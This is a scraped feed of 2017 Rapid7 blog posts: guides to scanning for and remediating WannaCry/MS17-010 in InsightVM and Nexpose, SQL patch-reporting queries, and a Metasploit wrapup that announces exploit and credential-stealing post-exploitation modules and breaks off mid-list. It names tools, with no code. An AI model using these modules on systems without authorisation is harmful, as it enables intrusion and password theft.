style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates > Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don’t forget to give your copy a name and description; here, we’ll call it “WNCRY Scan Template”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then “By Individual Check”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check “<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>” and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click “Remove Categories”, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click “Remove Check Types”, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the “Projects” tab and click “Create a Project”:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds <=> ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don’t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:bc62d177-a43a-4d62-b4f0-851708246874] -->", "cvss3": {}, "published": "2017-05-16T17:51:28", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-16T17:51:28", "id": "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/16/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-30T17:44:58", "description": "<!-- [DocumentBodyStart:b05ca008-b193-4e5a-83f6-20c7c1316da7] --><div class=\"jive-rendered-content\"><p>Many of our customers wish to report specifically on Microsoft patch related vulnerabilities. This often includes specific vulnerabilities that are patched in Patch Tuesday updates. This post will show you the various ways that you can create reports for each of these.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h3><span style=\"font-family: Arial, sans-serif;\"><strong>Remediation Projects</strong></span></h3><p><span style=\"font-family: Arial, sans-serif;\">Remediation Projects are a feature included in InsightVM that allow you to get a live view of the state of assets in your environment (please note that this feature requires that you have opted into the Insight Platform). Using Remediation Projects you can build dynamic projects that track vulnerabilities related to Microsoft patches as they are identified in your environment. To set up a dynamic project for Microsoft Patch related vulnerabilities, follow the steps below:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-family: Arial, sans-serif;\">Go to ‘Projects’ in the InsightVM menu and click ‘CREATE A PROJECT’</span></p><p><span style=\"font-family: Arial, sans-serif;\">You will see a new overlay appear which provides options to configure for the project. Under the ‘Project Content’ section, you can configure ‘Vulnerability Filters’. For reporting on all Microsoft Patch vulnerabilities, you can configure the following filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"font-family: Arial, sans-serif;\"><em>vulnerability.categories IN [\"Microsoft Patch\"] </em></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-family: Arial, sans-serif;\">For reporting on specific vulnerabilities, you can use a filter similar to this, changing the vulnerability titles to the ones for which you are interesting in creating a project:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"font-family: Arial, sans-serif;\"><em>vulnerability.title CONTAINS 'Microsoft CVE-2017-0175' || vulnerability.title CONTAINS 'Microsoft CVE-2017-0148'</em></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-family: Arial, sans-serif;\">As new vulnerabilities that meet the project criteria are identified, they will be added to the project.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h3>Using Vulnerability Filters</h3><p>Vulnerability filters allow you to filter on vulnerability , severity, and categories. These can be applied in the scope section of any report that you are generating, making this option very flexible.</p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7896-67052/vuln_filter_scope.png\"><img alt=\"vuln_filter_scope.png\" class=\"image-1 jive-image\" height=\"294\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7896-67052/vuln_filter_scope.png\" style=\"width: 620px; height: 139px;\" width=\"1308\"/></a></p><p>Within the Vulnerability Filter selection window, we can select the 'MICROSOFT PATCH' category.</p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7896-67053/vulnerability_filter_selection.png\"><img alt=\"vulnerability_filter_selection.png\" class=\"image-2 jive-image\" height=\"734\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7896-67053/vulnerability_filter_selection.png\" style=\"width: 620px; height: 339px;\" width=\"1340\"/></a></p><p>This allows for reporting on vulnerabilities that are specific to Microsoft patches for any report template, built-in or custom. The caveat to this method is that it will return all vulnerabilities in the MICROSOFT PATCH category. If you want to report on specific vulnerabilities fixed in Patch Tuesday updates, you can use the 'SQL Query Export' export template to facilitate this.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h3>SQL Query Export</h3><p>When reporting using the SQL Query Export template, it is important to know that Microsoft recently changed the naming scheme for security bulletins that it publishes. Prior to February 14th, 2017 Microsoft issued security bulletins using a this format: <span style=\"color: #333333; font-size: 14px; font-family: arial, helvetica, sans-serif;\"><em><em>msft-cve-yyyy-nnnn.</em></em></span> From February 14th, 2017 on, Microsoft will be using a CVE based format. You can read more about these changes here: <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7794\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/02/06/a-reminder-about-upcoming-microsoft-vulnerability-content-changes\">A Reminder About Upcoming Microsoft Vulnerability Content Changes</a>. What this means is that you may need to use both formats when using the SQL Query Export template, so keep in mind the format of the bulletin on which you want to report.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Below you will find a simple query that identifies hosts with specific vulnerabilities, as well as one that also includes remediation information.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><strong>Patch Tuesday</strong></p><p>SELECT</p><p>  da.ip_address AS ip_address,</p><p>  da.host_name AS hostname,</p><p>  dv.title AS vulnerability,</p><p>  dv.riskscore as vulnerability_riskscore,</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>  dv.date_published AS vulnerability_date_published,</p><p>  proofAsText(dv.description) AS vulnerability_description</p><p>FROM fact_asset_vulnerability_finding favf</p><p>  JOIN dim_asset da USING (asset_id)</p><p>  JOIN dim_vulnerability dv USING (vulnerability_id)</p><p>WHERE dv.title ~* '(Microsoft CVE-2017-0175|Microsoft CVE-2017-0148)'</p><p>ORDER BY round(dv.riskscore) DESC;</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Note the '|' delimiter between the vulnerability titles in the WHERE clause. This allows you to add as many patterns as necessary. The '~*' in the WHERE clause is a case-insensitive regex match operator.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><strong>Patch Tuesday with Remediations</strong></p><p>SELECT</p><p>  da.ip_address AS ip_address,</p><p>  da.host_name AS hostname,</p><p>  dv.title AS vulnerability,</p><p>  round(dv.riskscore) as vulnerability_riskscore,</p><p>  dv.date_published AS vulnerability_date_published,</p><p>  ds.summary AS solution_summary,</p><p>  proofAsText(ds.fix) AS fix</p><p>FROM dim_asset_vulnerability_best_solution</p><p>  JOIN dim_vulnerability dv USING (vulnerability_id)</p><p>  JOIN dim_asset da USING (asset_id)</p><p>  JOIN dim_solution ds USING (solution_id)</p><p>WHERE dv.title ~* '(Microsoft CVE-2017-0175|Microsoft CVE-2017-0148)'</p><p>ORDER BY round(dv.riskscore) DESC;</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>This query is similar to the previous query but also includes the solutions for vulnerabilities identified on a host. To learn more about using the InsightVM/Nexpose Data Model for reporting, check out the documentation here: <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FCreating_reports_based_on_SQL_queries.html\" rel=\"nofollow\" target=\"_blank\">https://help.rapid7.com/insightvm/en-us/#Files/Creating_reports_based_on_SQL_que ries.html</a></p></div><!-- [DocumentBodyEnd:b05ca008-b193-4e5a-83f6-20c7c1316da7] -->", "cvss3": {}, "published": "2017-05-30T14:46:34", "title": "InsightVM/Nexpose Patch Tuesday Reporting", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0148", "CVE-2017-0175"], "modified": "2017-05-30T14:46:34", "href": "https://community.rapid7.com/community/nexpose/report-templates/blog/2017/05/30/insightvmnexpose-patch-tuesday-reporting", "id": "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-27T03:53:29", "description": "<!-- [DocumentBodyStart:ee0b1b3b-bbf2-4606-8373-d3040813f239] --><div class=\"jive-rendered-content\"><p>It has been an intense couple of weeks in infosec since the last Wrapup and we've got some cool things for you in the latest update.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Hacking like No Such Agency</h2><p>I'll admit I was wrong. For several years, I've been saying we'll never see another bug like <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms08_067_netapi\" target=\"_blank\">MS08-067</a>, a full remote hole in a default Windows service. While I'm not yet convinced that MS17-010 will reach the same scale as MS08-067 did, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue</a> has already done substantial damage to the internet. Rapid7 bloggers covered a bunch of the details last week.</p><p><a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a></p><ul><li><a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">More on the EternalBlue Metasploit module</a></li><li><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7866\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose\">How to scan your network for the WannaCry vulnerability with InsightVM and Nexpose</a></li><li><a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">A deep dive into the WannaCry vulnerability</a></li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Since the last Wrapup, we've added an exploit for EternalBlue that targets x64 on the Windows 7 kernel (including 2008 R2). Updates are in the works to cover x86 and other kernels. There is also a scanner that can reliably determine exploitability of MS17-010, as well as previous infection with DOUBLEPULSAR, the primary payload used by the original leaked exploit.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>While EternalBlue was making all the headlines, we also landed an exploit module for the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fiis%2Fiis_webdav_scstoragepathfromurl\" target=\"_blank\">IIS ScStoragePathFromUrl bug (CVE-2017-7269)</a> for Windows 2003 from the same dump. This one requires the victim to have WebDAV enabled, which isn't default but <em>is</em> really common, especially on webservers of that era. Since 2003 is End of Support, Microsoft is not going to release a patch.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Dance the Samba</h2><p>In the few days since we spun this release, we also got a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fsamba%2Fis_known_pipename\" target=\"_blank\">shiny new exploit module for Samba</a>, the Unixy SMB daemon that runs on every little file sharing device ever. Expect some more discussion about it in the next wrapup. In the mean time, you can read more about the <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7892\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life\">effects of the bug</a>.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>WordPress PHPMailer</h2><p>WordPress, which powers large swaths of the internet, embeds a thing called PHPMailer for sending email, mostly for stuff like password resets. Earlier this May, security researcher <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftwitter.com%2Fdawid_golunski\" rel=\"nofollow\" target=\"_blank\">Dawid Golunski</a> published a vulnerability in PHPMailer. The vulnerability is similar to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fmulti%2Fhttp%2Fphpmailer_arg_injection\" target=\"_blank\">CVE-2016-10033</a>, discovered by the same researcher. Both of these bugs allow you to control arguments to <code>sendmail(1)</code>.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Now, vulns in WordPress core are kind of a big deal, since as previously mentioned, WP is deployed <em>everywhere</em>. Unfortunately (or maybe fortunately depending on your perspective), there is a big caveat -- Apache since 2.2.32 and 2.4.24 changes a default setting, <code>HttpProtocolOptions</code> to disallow the darker corners of <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc2616\" rel=\"nofollow\" target=\"_blank\">RFC2616</a>, effectively mitigating this bug for most modern installations.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>The intrepid <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"18896\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/wvu\">@wvu</a> set forth to turn this into a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2F\" target=\"_blank\">Metasploit</a> module and came out the other side with some shells and interesting discoveries that he'll cover in a more detailed technical post coming soon to a Metasploit Blog near you.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Railgun</h2><p>While Meterpreter is a very powerful and flexible tool for post exploitation on its own, sometimes you need the flexibility to go beyond the functionality that it provides directly. There may be a special API that needs to be called to extract a credential, or a certain system call that is required to trigger an exploit. For a long time, Windows Meterpreter users have enjoyed the use of the Railgun extension, which provides a way to do just that, similar to FFI (Foreign Function Interface) that is available in many scripting languages, but operating remotely. Thanks to an enormous effort by Metasploit contributor, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftwitter.com%2Fzerosteiner\" rel=\"nofollow\" target=\"_blank\">zeroSteiner</a>, Linux users can now also take advantage of Railgun, as it is now implemented as part of Python Meterpreter! This functionality opens the door to many new post-exploitation module possibilities, including the ability to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Flinux%2Fgather%2Fgnome_keyring_dump\" target=\"_blank\">steal cleartext passwords from gnome-keyring</a>. See <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7882\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/18/recent-python-meterpreter-improvements\">zeroSteiner’s blog</a> and his <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwarroom.securestate.com%2Finner-workings-railgun%2F\" rel=\"nofollow\" target=\"_blank\">more technical companion piece</a> for more details.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Steal all the things</h2><p>This week's update also continues the fine tradition of Stealing All the Things(tm). The aforementioned gnome-keyring dumper allows you to steal passwords from a logged-in user. In a similar vein, if you have a shell on a JBoss server, <code>post/multi/gather/jboss_gather</code> will give you all the passwords. The fun thing about both of these is that they work on the principle that you have permission to read these things -- there is no exploit here, and nothing to be patched.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>On the other side of things, <code>auxiliary/admin/scada/moxa_credentials_recovery</code> does take advantage of a vulnerability to grab all the creds from a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fblog.talosintelligence.com%2F2017%2F04%2Fmoxa-box.html\" rel=\"nofollow\" target=\"_blank\">cute little SCADA device</a>.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>New Modules</h2><p><em>Exploit modules</em> <em>(10 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fcrypttech_cryptolog_login_exec\" target=\"_blank\">Crypttech CryptoLog Remote Code Execution</a> by Mehmet Ince</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fmisc%2Fquest_pmmasterd_bof\" target=\"_blank\">Quest Privilege Manager pmmasterd Buffer Overflow</a> by m0t exploits CVE-2017-6553</li><li><a class=\"jive-link-external-small\" 